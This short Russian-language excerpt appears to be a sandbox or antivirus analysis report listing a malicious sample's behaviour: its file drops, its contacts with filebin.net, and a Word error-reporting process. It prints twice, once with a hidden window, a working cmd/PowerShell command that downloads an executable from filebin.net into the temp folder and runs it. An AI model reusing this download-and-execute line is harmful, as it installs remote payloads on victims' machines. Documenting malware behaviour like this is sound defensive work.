Техническая информация
- https://filebin.net/7fmy8yftdpmoqym3/ksdjofjaijkdlmsc.exe как %temp%\sss.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/7fmy8yftdpmoqym3/ksdjofjaijkdlmsc.exe','%TMP%\sss.exe');Start-Process '%TMP%\sss.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1392
- %TEMP%\1405787.cvr
- 'fi##bin.net':443
- 'fi##bin.net':443
- DNS ASK fi##bin.net
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/7fmy8yftdpmoqym3/ksdjofjaijkdlmsc.exe','%TMP%\sss.exe');Start-Process '%TMP%\sss.exe';' (со скрытым окном)